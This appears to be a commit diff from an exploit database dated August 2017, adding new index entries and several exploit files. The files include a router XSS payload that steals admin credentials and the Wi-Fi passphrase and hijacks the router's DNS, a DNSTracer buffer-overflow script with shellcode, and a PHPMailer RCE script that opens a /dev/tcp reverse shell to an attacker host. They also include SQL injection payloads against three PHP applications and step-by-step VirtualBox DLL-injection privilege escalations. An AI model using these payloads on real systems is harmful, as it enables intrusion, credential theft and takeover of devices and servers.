DB: 2017-08-04

7 new exploits

DNSTracer 1.8.1 - Buffer Overflow
DNSTracer 1.8.1 - Buffer Overflow (PoC)
DNSTracer 1.9 - Buffer Overflow
VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation
VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation
Premium Servers List Tracker 1.0 - SQL Injection
EDUMOD Pro 1.3 - SQL Injection
Muviko 1.0 - 'q' Parameter SQL Injection
Technicolor TC7337 - SSID Persistent Cross-Site Scripting

files.csv

@@ -5528,7 +5528,7 @@ id,file,description,date,author,platform,type,port
 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
 42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos,0
-42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
+42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow (PoC)",2017-06-05,FarazPajohan,linux,dos,0
 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42135,platforms/android/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",android,dos,0
@@ -9169,6 +9169,9 @@ id,file,description,date,author,platform,type,port
 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
 42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
+42424,platforms/linux/local/42424.py,"DNSTracer 1.9 - Buffer Overflow",2017-08-03,j0lama,linux,local,0
+42425,platforms/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
+42426,platforms/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38219,3 +38222,7 @@ id,file,description,date,author,platform,type,port
 42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
+42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
+42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
+42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0

platforms/hardware/webapps/42427.html

@@ -0,0 +1,90 @@
+// Device : Technicolor TC7337
+// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
+// XSS through SSID : '><script src=//url.co></script>   ( Exactly 32 bytes u_u )
+//                             ^
+//  5char domains are running  |    'src' does not requires quotes , and passing the URL with ony '//'
+//  out, grab yours !          +---> it will cause the browser to make the request with the current protocol,
+//                                   which is HTTP , duh
+// Below is the content of url.co/index.html
+// index.html ( which is just a JavaScript actually, but we have to use the index to fit the 32 chars ) :
+
+function get_passwords(attackers_server) {
+  // attackers_server = server to send the credentials
+  // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  // XSS to get Admin's login/passwd + Wifi passphrase
+  // from backup settings
+
+  xmlhttp=new XMLHttpRequest();
+  xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
+  xmlhttp.send();
+  var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's Login and Password
+  var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for Wifi PassPhrase
+  // Add a img requesting the attacker website with the leaked passwords in the GET parameters
+  document.write('<img src="'+attackers_server+'?net='+ encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">');
+}
+
+function reboot_router() {
+  // XSS + CSRF reboot router
+  // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  // Why? Because It's fun to watch a XSS doing 'physical' stuff
+
+  xmlhttp=new XMLHttpRequest();
+  xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of the reset interface
+  xmlhttp.send();
+  var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
+  var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
+
+  xmlhttp=new XMLHttpRequest();
+  xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false);
+// Request the reboot page with the CSRF token
+  xmlhttp.send();
+}
+
+function dns_poisoning(attackers_dns) {
+  // attackers_dns = malicious DNS Server
+  // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit my code is ugly as fuck , sorry world
+  // Alter the DNS Config of the Router
+  // changing the Primary and Secondary DNS to the attacker's one
+
+  xmlhttp=new XMLHttpRequest();  
+  xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
+  xmlhttp.send();
+  var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
+  var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1]; // Regex because the key is inside quotes
+  var i_wanip = xmlhttp.responseText.indexOf("wanip");
+  var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1];
+  var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet");
+  var wansubnet = xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1];
+  var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip");
+  var wangatewayip = xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1];
+
+  xmlhttp=new XMLHttpRequest();
+  xmlhttp.open("GET", "/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey, false);
+  xmlhttp.send(); // Send the request to SAVE the Primary and Secondary DNS with the CSRF Token
+
+  //After saving we need to apply the settings. yeah, fuck logic --'
+
+  //Getting a brand NEW SessionKey
+  xmlhttp=new XMLHttpRequest();  
+  xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
+  xmlhttp.send();
+  var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
+  var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
+
+  xmlhttp=new XMLHttpRequest();  
+  xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false);
+// GET the apply DNS page
+  xmlhttp.send();
+}
+
+//Choose your path !
+//get_passwords("https://evil.domain/") ;
+//reboot_router();
+dns_poisoning("1.3.3.7")
+
+// TimeLine
+// ---------
+// 08/07/2017 - First email sent to the vendor (no answer)
+// 16/07/2017 - Second email sent to the vendor (no answer)
+// 18/07/2017 - Third email sent to the vendor (no answer)
+// 02/08/2017 - Full Disclosure

platforms/linux/local/42424.py

@@ -0,0 +1,46 @@
+# Exploit Title: DNSTracer 1.9 - Buffer Overflow
+# Google Dork: [if applicable]
+# Date: 03-08-2017
+# Exploit Author: j0lama
+# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
+# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
+# Version: 1.9
+# Tested on: Ubuntu 12.04
+# CVE : CVE-2017-9430
+# Bug report: https://www.exploit-db.com/exploits/42115/
+# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php
+
+
+# Proof of Concept
+import os
+from subprocess import call
+
+def run():
+    try:
+        print "\nDNSTracer Stack-based Buffer Overflow"
+        print "Author: j0lama"
+        print "Tested with Dnstracer compile without buffer overflow protection"
+
+        nops = "\x90"*1006
+        shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+        filling = "A"*24
+        eip = "\x2f\xeb\xff\xbf"
+
+        #buf size = 1057
+        buf = nops + shellcode + filling + eip
+
+        call(["./dnstracer", buf])
+
+    except OSError as e:
+        if e.errno == os.errno.ENOENT:
+            print "\nDnstracer not found!\n"
+        else:
+            print "\nError executing exploit\n"
+        raise
+
+
+if __name__ == '__main__':
+    try:
+        run()
+    except Exception as e:
+        print "Something went wrong"

platforms/php/webapps/42221.py

@@ -10,6 +10,8 @@
 #
 # @phackt_ul - https://phackt.com
 # 
+# Find the last updated version here: https://raw.githubusercontent.com/phackt/pentest/master/exploits/rce_phpmailer_exim.py
+# 
 # All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com
 # and its research on PHP libraries vulns
 #
@@ -75,10 +77,10 @@ def send_request(req):
     try:
         urllib2.urlopen(req)
     except urllib2.HTTPError, e:
-        print "[!] Got HTTP error: [%d] when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % e.code
+        print "[!] Got HTTP error: [%d] when trying to reach " % e.code + req.get_full_url() + " - Check the URL!\n\n"
         exit(3)
     except urllib2.URLError, err:
-        print "[!] Got the '%s' error when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % err.reason
+        print "[!] Got the '%s' error when trying to reach " % str(err.reason) + req.get_full_url() + " - Check the URL!\n\n"
         exit(4)
 
 # Parse input args
@@ -110,10 +112,10 @@ POST_MSG             = [%s]
 # Ask for mail library
 print "[+] Choose your target / payload: "
 print "\033[1;34m"
-print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"""
-print """    SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"""
-print """    Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"""
-print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"""
+print "[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"
+print "    SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"
+print "    Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"
+print "[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"
 print "\033[0m"
 
 try:
@@ -129,7 +131,7 @@ if (target>2):
 ################################
 # Payload
 ################################
-cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'"
+cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/%s/%s;nohup sh <&196 >&196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
 prepared_cmd = prepare_cmd(cmd)
 
 payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'

platforms/php/webapps/42419.txt

@@ -0,0 +1,20 @@
+Exploit Title: Premium Servers List Tracker v1.0 – SQL Injection
+Date: 02.08.2017
+Vendor Homepage: https://codecanyon.net/item/premium-servers-list-tracker/19796599?s_rank=270
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Premium phpServersList is an advanced servers management tool which allows users to track their own servers and visitors to find out great servers from all over the world. Our product is very flexible and, with a little imagination you can make your own unique servers list website.For example: If you want to make a certain type of servers list ( lets say, Counter Strike ) then you can setup from the admin panel so that users can only add Counter Strike Servers; Or if you want to have diversity in your website you can make it a top list, where everyone can add any type of server to the list.
+
+Vulnerable Url: http://localhost/server/1[payload]
+
+---
+Parameter: #1* (URI)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: http://localhost/server/1 AND SLEEP(5)
+---

platforms/php/webapps/42420.txt

@@ -0,0 +1,44 @@
+Exploit Title: School Management System | EDUMOD Pro v1.3 – SQL Injection
+Date: 02.08.2017
+Vendor Homepage: https://codecanyon.net/item/school-management-system-edumod-pro/19764430?s_rank=288
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+EDUMOD Pro is an advanced school management software based on web. It is developed with core PHP and mysql. You can manage all your school with a simple and understandable user interface. All modules available in software is under a start menu you can click to menu and go anywhere accross modules. There are various modules available for you and for your school in EDUMOD.
+
+Vulnerable Url: http://localhost/students/search.php (POST Method)
+
+Sqlmap Example : sqlmap -u "http://localhost/students/search.php" --cookie="_gat=1; _omappvp=true; _omappvs=true; _ga=GA1.2.810440502.1501701941; _gid=GA1.2.661879708.1501701941; PHPSESSID=i7gcjsi41rbm48ejn2a1ddgfti" 
+--data="Query=Test&action=Search"
+
+---
+Parameter: Query (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: Query=Test%' AND 5466=5466 AND '%'='&action=Search
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
+ause (FLOOR)
+    Payload: Query=Test%' AND (SELECT 7257 FROM(SELECT COUNT(*),CONCAT(0x717a7a7
+671,(SELECT (ELT(7257=7257,1))),0x7171767871,FLOOR(RAND(0)*2))x FROM INFORMATION
+_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&action=Search
+
+    Type: stacked queries
+    Title: MySQL > 5.0.11 stacked queries (comment)
+    Payload: Query=Test%';SELECT SLEEP(5)#&action=Search
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: Query=Test%' AND SLEEP(5) AND '%'='&action=Search
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: Query=Test%' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7671,0x4d715
+07376585366416c53467453544e687853795747574a627351635357467676616366706e6355,0x71
+71767871),NULL,NULL-- SXjD&action=Search
+---

platforms/php/webapps/42421.txt

@@ -0,0 +1,31 @@
+Exploit Title: Muviko - Video CMS v1.0 – 'q' Parameter SQL Injection
+Date: 02.08.2017
+Vendor Homepage: https://muvikoscript.com/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+Muviko is a movie & video content management system. 
+Powerful, scalable and multi-purpose. 
+It has been built from the ground up to provide users with an excellent experience. 
+Uses can subscribe to watch your videos and earn you money. 
+You choose which of your videos require users to subscribe, and which are free. 
+You can also earn money from Ads.
+
+
+Vulnerable Url: https://localhost/search.php?q=[payload]
+
+Sqlmap Example : sqlmap.py -u "https://localhost/search.
+php?q=star" --cookie="PHPSESSID=ipqrq203upp0kshdetjgn2hk12; _ga=GA1.2.1947531638
+.1501703867; _gid=GA1.2.1749506565.1501703867; _gat=1"
+
+---
+Parameter: q (GET)
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 15 columns
+    Payload: q=test' UNION ALL SELECT NULL,CONCAT(CONCAT('qqpzq','lHGBmBgXqPlXdk
+uRCaimornRFWRUtWPKLWYLzQeK'),'qqvvq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
+LL,NULL,NULL,NULL,NULL-- Gqvt
+---

platforms/windows/local/42425.txt

@@ -0,0 +1,73 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1257
+
+VirtualBox: Windows Process DLL Signature Bypass EoP
+Platform: VirtualBox v5.1.22 r115126 x64 (Tested on Windows 10)
+Class: Elevation of Privilege
+
+Summary:
+The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user.
+
+Description:
+ 
+NOTE: I don’t know if you consider this an issue or not, however you fixed the last bypass I sent so it’s possible you still consider it a security boundary.
+ 
+The ring 3 process hardening in VirtualBox adds three hooks to module loading to try and prevent untrusted code being loaded into the process, LdrLoadDll, NtCreateSection and a LDR DLL notification. Each will try and verify a DLL load and either reject the load with an error or kill the process is it’s not possible to prevent it from occurring. Looking at the hooks there a couple of issues which when combined together allow a user to inject an arbitrary DLL into a protected process.
+ 
+The location checks are not very rigorous. As far as I can tell arbitrary files need to be owned by an admin/trustedinstaller but this check is waived if the file is in system32/WinSxS. However this doesn’t take into account that there are some directories which can be written to inside system32 such as Tasks.
+The code to enforce specific certificates doesn’t seem to be enabled so at the very least combined with 1, you can load any validly signed file.
+ 
+It might be considered that 2 isn’t an issue as getting a signing cert could be a sufficient burden for a “malicious” attacker, so instead it’s worth considering what else the weak path checking allows you to do. The handling of DLL paths has some interesting behaviours, most interestingly there’s the behaviour where if no file extension is added to the path then the loader will automatically append .DLL to it. This is actually implemented inside LdrLoadDll, this leads to our third problem:
+ 
+3.  If the path passed to LdrLoadDll doesn’t have an extension then the protection code will signature check the extension less file but the loader will load the file with a .DLL extension. E.g. if trying to load \path\abc then \path\abc is signature checked but \path\abc.dll is loaded. 
+ 
+When combined with the ability to bypass the owner check we can drop an arbitrary valid signed file alongside our untrusted DLL and exploit this TOCTOU to load an arbitrary unsigned DLL. The following will show inside the VboxHardening.log when loading the file testdll.
+ 
+2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll: Owner is not trusted installer
+2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
+2064.492c: supHardenedWinVerifyImageByHandle: -> 0 (\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll) WinVerifyTrust
+2064.492c: supR3HardenedWinVerifyCacheInsert: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll
+2064.492c: supR3HardenedMonitor_LdrLoadDll: pName=c:\windows\system32\tasks\dummy\testdll (rcNtResolve=0xc0150008) *pfFlags=0x0 pwszSearchPath=0000000000002009:<flags> [calling]
+ 
+This shows that it successfully passed the signature check inside the LdrLoadDll hook, however one of the other hooks should try and recheck the real testdll.dll file when it gets loaded instead. As the name of this file won’t match the cached signature check it should still fail to complete loading. This is where the fourth issue comes in:
+ 
+4. When doing the check inside supHardenedWinVerifyImageByHandle with WinVerifyTrust disabled (i.e. when in the DLL load notification hook) and the target file has no signature information an incorrect error code is returned which looks like success leading to the DLL being allowed to load and execute. 
+ 
+Specifically when supR3HardenedDllNotificationCallback is called it passes true to the fAvoidWinVerifyTrust parameter of supR3HardenedScreenImage. This first uses the RT code to check if the file is signed or not, if we use an unsigned file then this will return the error VERR_LDRVI_NOT_SIGNED (-22900). Later in supHardenedWinVerifyImageByLdrMod this error is checked and the function supHardNtViCheckIfNotSignedOk is called. This seems to result in the error coding changing from an error to VINF_LDRVI_NOT_SIGNED (22900) which is actually a success code. Normally this would be overridden again by the call to WinVerifyTrust but because that’s disabled the final result of this process is the DLL notification callback thinks the signature check was successful even though it wasn’t. This results in the DLL being allowed to complete loading.
+ 
+For example the following is a snippet of the output when the bypass occurs.
+ 
+2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll: Owner is not trusted installer 
+2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
+2064.492c: supR3HardenedWinVerifyCacheScheduleImports: Import todo: #1 'user32.dll'.
+2064.492c: supR3HardenedWinVerifyCacheScheduleImports: Import todo: #2 'advapi32.dll'.
+2064.492c: supHardenedWinVerifyImageByHandle: -> 22900 (\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll)
+2064.492c: supR3HardenedWinVerifyCacheInsert: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll
+2064.492c: supR3HardenedDllNotificationCallback: load   00007ff8a8600000 LB 0x00027000 c:\windows\system32\tasks\dummy\testdll.DLL [fFlags=0x0]
+2064.492c: supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900 (0x5974)) on \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll [avoiding WinVerifyTrust]
+2064.492c: Detected loader lock ownership: rc=Unknown Status 22900 (0x5974) '\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll'.
+2064.492c: supR3HardenedWinVerifyCacheProcessWvtTodos: 22900 (was 22900) fWinVerifyTrust=0 for '\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll' [rescheduled]
+ 
+This combination of issues results in being able to inject arbitrary executable code into a VirtualBox protected process and access the resources such as the kernel driver that this would provide.
+
+Proof of Concept:
+
+I’ve provided a PoC DLL which will be loaded through abusing the VBox COM Client loading process in source form. I’ve also provided a registry file which will need to be imported.
+ 
+Prerequisites: 
+The DLL must be compiled in release mode for the architecture you’re going to run VirtualBox on. Then follow these steps:
+ 
+1) Create the directory c:\windows\system32\tasks\dummy on the command line using ‘mkdir c:\windows\system32\tasks\dummy’
+2) Import the provided .reg file to setup the COM hijack using the command line ‘reg import keys.reg’
+3) Copy a valid signed file (such as VirtualBox.exe) to the file c:\windows\system32\tasks\dummy\testdll.
+4) Copy the compiled PoC dll to c:\windows\system32\tasks\dummy\testdll.dll.
+5) Start a VM. Each process the DLL is injected into will show a message box. This will include the protected VirtualBox.exe process.
+
+Expected Result:
+Untrusted DLL loading should fail inside a protected process.
+
+Observed Result:
+DLL is loaded into the protected process.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42425.zip

platforms/windows/local/42426.txt

@@ -0,0 +1,55 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1296
+
+VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP
+Platform: VirtualBox v5.1.22 r115126 x64 (Tested on Windows 10)
+Class: Elevation of Privilege
+
+Summary:
+The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user.
+
+Description:
+ 
+NOTE: I don’t know if you consider this an issue or not, however you fixed the last bypass I sent so it’s possible you still consider it a security boundary.
+
+This is a similar issue in impact to the one I reported in S0867394 but it uses a completely different mechanism. Once again we can use a current user COM registration to redirect the VBOX COM object to an arbitrary DLL path. However in this case rather than using MS signed code or abusing path behaviours in DLL library loading (and a bug in the hardening code) we'll instead abuse the way Windows handles image mapping from a kernel perspective.
+
+On Windows mapped DLLs use an Image Section under the hood. This is a special type of file mapping where the parsing and relocating of the PE file is all handled by the kernel. To allow for sharing of image mappings (so ideally the kernel only needs to do the parsing and relocation once) the kernel memory manager ties the file object to an existing section object by using a unique section pointer set by the file system driver. The interesting thing about this is the section pointer doesn't necessarily ensure the file hasn't changed, just that the file system considered the file the "same". Therefore it's possible that opening a file and reading it returns a completely different PE file than the one you'll get if you then map that file as an image section.
+
+If we can get a file mapped via one section pointer, then change the file underneath to be a different one we can exploit this. However on a default NTFS drive this isn't really possible due to things like sharing (outside of having admin privileges) so we need to use something different. For that we can use the SMB client file system. When you open a file via a UNC path any queries for the path return a MUP device path such as \Device\Mup\server\share\path\file.dll. When this is first mapped into memory the section pointer is used to refer to any file with that same path, however when opening the file the SMB client still needs to go to the server and receive the current data. Even with SMB supporting locking hopefully you can see that if you control the server as an admin then all bets are off with regards to returning the same data. In the worst case you could compile SAMBA with some custom code to do the attack (not that it would be needed). SMB also supports all the necessary file operations the hardening code checks for such as requesting the file Owner so we can pass all the checks with this. So to do the attack we can do the following:
+
+1. Load our untrusted DLL from \\server\share\path\file.dll and map it into memory using something like LoadLibrary. This mapping needs to stay valid for the entire exploit to work.
+2. Change the untrusted DLL file on the server to one which is a valid file for the hardening code and also has a owner set appropriately.
+3. Add current user COM redirection to point VBOX class to the original UNC path.
+4. Run VirtualBox. The hardening code will read the UNC path and find it's a valid file, however when the kernel maps the image section in NtMapViewOfSection it will find it's already got a mapped image loaded and will use that instead, the mapped image is of course the untrusted DLL, not the one the hardening code checked.
+5. The untrusted DLL will be loaded into memory and executed.
+
+This is easy enough using a remote server but it would be more useful to exploit locally. For that we can use the default admin shares on a Windows system which expose the drives over SMB. Even though their primary purpose is for administration you don't need to be an administrator if you access them locally, you'll just get access just a the same user account. So we can do the redirection of the file access as follows:
+
+1. Set up a path such as c:\poc somewhere on an NTFS drive and copy the untrusted DLL to that directory called vboxc.dll.
+2. Create a mount point (a directory symlink) at c:\poc\dummy which redirects to c:\poc.
+3. Map \\localhost\c$\poc\dummy\vboxc.dll. The SMB server will follow the mount point and open c:\poc\vboxc.dll, however from the client perspective (even though we're on the same machine) the file still thinks the original UNC path.
+4. Change the mount point to c:\program files\oracle\virtualbox.  Now when accessing the UNC path the file opened will be the real vboxc.dll file which is signed and has a trusted owner.
+
+The main reason this works is the fact that from a client perspective the filename never changes therefore the hardening code can't do much about it. The only way to tell the mapped file doesn't match the original would be to check the acual mapped image data as requesting its path using the memory manager would just return the UNC path. Ultimately I guess you probably shouldn't be trusting code on UNC paths.
+ 
+Proof of Concept:
+
+I’ve provided a PoC which will abuse the VBox COM Client loading process in source form.
+ 
+Prerequisites: 
+Compile the supplied project in release mode using VS2015. I've only provided x64 version, it should work on x86 but I've not got anything to test it on. Then follow these steps:
+ 
+1) Create the directory c:\poc and copy RunPoc.exe, NtApiDotNet.dll and the fake vboxc.dll to that directory.
+2) Execute RunPoc.exe, it should print that it's successfully loaded the file. At this point DO NOT close the RunPoc executable as the file needs to stay mapped.
+3) Start a VM. Each process the DLL is injected into will show a message box. This will include the protected VirtualBox.exe process.
+4) When done testing hit enter in the RunPoc executable to ensure the keys get deleted.
+
+Expected Result:
+Untrusted DLL loading should fail inside a protected process.
+
+Observed Result:
+DLL is loaded into the protected process.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42426.zip